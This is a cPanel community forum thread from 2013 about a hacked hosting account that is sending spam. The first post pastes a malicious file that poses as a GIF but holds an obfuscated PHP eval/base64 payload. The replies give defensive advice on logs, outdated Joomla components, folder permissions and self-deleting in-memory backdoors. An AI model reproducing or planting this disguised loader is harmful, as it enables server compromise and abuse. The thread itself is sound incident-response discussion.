The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Checking strange activity on account

Discussion in 'Security' started by madpato, Oct 14, 2013.

  1. madpato

    madpato Active Member

    Joined:
    May 30, 2008
    Messages:
    41
    Likes Received:
    0
    Trophy Points:
    6
    Hello

    I have a user which i believe has been hacked and sends spam, well i have CSF and it let me know which file was doing this, got rid of it (yesterday) but today more php files showed up on the same folder, so i assume this is not over. Even i got some gif files with strange code like this:

    Code:
    GIF89aGbkht
    <?php eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP58VfyHci+SHRVBHDlmJZyRcHO4LIHhwYpIF23jtrqE5xH/vzNrOWKEcrRohb8/rM8/MzoYrJUisaymVEcXU3e3uYmGICWS3hNbcuJ04CqOoN+hfOXBpy+6cm2H3t8fNjc690MIksioMCcguOGge+Bge0W74Yji8onSj0VJ8NohT9AbVorhdRg/Dfy7DdRRfDnu1wUumZrCgLHJxzoopAQ+eGGVdYHX0p3Wm2YTnuykH00KiEPEUQzoojGaZZXSBf27YJY8dzZNXCTOH8NHRdhifD0bh+WAUrjjlWXEuva0Um7JPz2uWfZqizFhxQbcJtTzRem3GtMjIX9gUSZCZMeWe77dZAXRKbrpNukjtqtq/iFRrT3pinaq6cIjJKZJPTACJPxw97ROdkhJ/2oH44O/E1pMEmHiL8xnFU4bk38x4MPJJEZNOv3j/YDhofUW3Hz6IE/XjhqQBhK0OuAutSD4m8QACU2O0koe0PnEJiupO7EeBNleVRbuo32l8x86hSHqhLuNPZEapgqDEA+O2p48rZTvkjfylFNfXP5IDrL+fpFaElDlAmcpWjjsEmL7ApVeY5SCg9PBoT49ynrMiegk8EFJMGW/mJQ+o4V8MJchkQJM8pevaqBrnb6mv40Nlz7LKvt+BvY/IDp39aKQcGnFQ5EhzUcmUsWk7KTOsUt6Wg9X8QgmXciZMV0FSxnoZPk0/q3Mm0pQXDU1dcF8zmIB/o8bZxEra8/S+89sgp0X0+QDYal4nQhyB/CoCYtBDUBANis2N4s4A03i4aLxvPhD94nbwq/X/CQ29u42wIEz9VfEeQnQzuZJjsZZl4E/hU=')))); ?>
    Now i want to know where can i look to see the origin of this, tried ftp logs and nothing, /var/log/messages nothing regarding the location (or even mentioning the user account).
    What i do know that this user has an old joomla install i know for a fact that is probably the reason of this, what i need to know is a server-side solution to stop the creation of those files. Maybe changing permission of folders?

    Any ideas? Thanks.
     
  2. quietFinn

    quietFinn Well-Known Member

    Joined:
    Feb 4, 2006
    Messages:
    998
    Likes Received:
    10
    Trophy Points:
    18
    Location:
    Finland
    cPanel Access Level:
    Root Administrator
    You shold check that account's access logs:
    /home/CPANELUSERNAME/access_logs
     
  3. madpato

    madpato Active Member

    Joined:
    May 30, 2008
    Messages:
    41
    Likes Received:
    0
    Trophy Points:
    6
    Hi

    Im afraid that directory is empty maybe i have something disabled that prevents the log from appearing??
     
  4. quizknows

    quizknows Well-Known Member

    Joined:
    Oct 20, 2009
    Messages:
    940
    Likes Received:
    55
    Trophy Points:
    28
    cPanel Access Level:
    DataCenter Provider
    Check /usr/local/apache/domlogs

    However, they need to update / patch their software. No amount of server-side security can make up for users running hackable applications. Do not allow people to run vulnerable appliations on your server. A good modsecurity ruleset can stop a lot of hacks but it is not foolproof.

    If the file in quesiton is in public_html/images/stories/ or public_html/tmp/ they probably have a hackable com_jce component. Check the date on files inside of public_html/components/com_jce/. If they are more than a year or two old that is the easiest way for an attacker to upload that code to a joomla site.
     
  5. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    30,678
    Likes Received:
    654
    Trophy Points:
    113
    cPanel Access Level:
    Root Administrator
    Hello :)

    Also, check to see if any of the directories within this account are using insecure permissions (e.g. 0777). It's possible the scripts are uploaded through a Joomla plugin that allows uploads of this nature.

    Thank you.
     
  6. sehh

    sehh Well-Known Member

    Joined:
    Feb 11, 2006
    Messages:
    579
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Europe
    There is another cool way they use to do this, once they compromise an account, they upload a file, execute it and delete it, while leaving the process alive and kicking in memory!

    Thus, there is no file for you to find, its just not there because it deletes itself.

    Once this process is started, the file will open a TCP port and listen for remote commands, execute code, upload files in tmp directories, send information about the server to a remote listener, so on and so forth.

    So check the running processes, I've seen them use process names like "mysql" and similar ones.

    I found their trick quite effective and imaginative! :)
     
Loading...

Share This Page